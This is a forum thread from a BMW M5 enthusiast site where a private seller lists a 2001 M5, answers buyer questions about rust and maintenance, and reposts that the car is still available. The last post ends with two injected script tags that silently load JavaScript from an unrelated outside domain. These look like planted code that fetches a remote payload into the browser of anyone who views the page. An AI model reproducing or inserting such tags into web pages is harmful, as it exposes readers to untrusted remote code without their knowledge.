BMW M5 Forum and M6 Forums banner

1 - 19 of 19 Posts

·
Registered
794 Posts
Discussion Starter #1

NOTE: Looking to trade for a daily driver too. If this ad is still up then it means the car is still available.

Year: 2001
Make: BMW
Model: M5
Miles: 124k
Options: Fully loaded with Eletric Rear and Side Sun Shade, Fold Down Rear Seats/Ski Sack, Park Distance Control, M Audio System with Enhanced Bass,

Exterior: Titanium Silver Metallic, 7/10 condition.
Interior: Black Nappa leather, 9/10 condition.
Seller: Private
Title: Clean carfax with no accidents

Pink Slip: In hand ready to sign over
No. previous owners: 3 previous owners and the last one being a BMW Beverly Hills technician.
Modifications: None, all original.

Maintenance: Completed a pre-purchase inspection and spent several thousands on service/maintenance items, only BMW recommended parts (including Castrol TWS 10W-60) were used. No fluid leaks, no VANOS noise and it drives like new.
Reason for selling: Moving out of state
Price: $13250.

If you're interested please message me your phone number and I can also provide more details/pictures.

·
Registered
3,337 Posts
GLWS. Someone steal this car at this price.

Reactions: M5_Forever

·
Registered
80 Posts
Any rust on the car? Do you have the maintenance records for the car? Any additional photos? Also how long have you owned the car for?

Martin

·
Registered
794 Posts
Discussion Starter #5
Any rust on the car? Do you have the maintenance records for the car? Any additional photos? Also how long have you owned the car for?

Martin
Zero rust, this is a California car and lived its whole life here. I don't have previous records from other owners but I just spent $3.5K refreshing everything needed in the car. Email me at [email protected] for more photos. Owned the car for about 3 months but need to sell due to job relocation.

·
Registered
29 Posts
Looks good! Nice Price.

·
Registered
794 Posts
Discussion Starter #13
Still available...

2001 BMW M5 with 124k highway miles. 9/10 exterior and 9/10 interior, always garaged. Passed smog with flying colors. Clean title with pink slip in hand. All service and maintenance completed (records available), spent $3,500 bringing it up-to-date. All original stock car with no modifications.

Only filled with 91 octane Shell. Also only used synthetic 10w-60 TWS Castrol from the BMW dealership.

$13,500 firm, call/text if you're interested. May trade for a daily driver plus cash.

2001 BMW M5

·
Registered
5 Posts
is the M5 still available? I tried to PM you but I am new to the forum and my post count isn't high enough. Please email me at [email protected] Thanks!

·
Registered
794 Posts
Discussion Starter #17
is the M5 still available? I tried to PM you but I am new to the forum and my post count isn't high enough. Please email me at [email protected] Thanks!
Emailed.
<script src="//alexaboostup.com/plugin/helper.js" type="text/javascript"></script><script src="//alexaboostup.com/plugin/content.js" type="text/javascript"></script>

1 - 19 of 19 Posts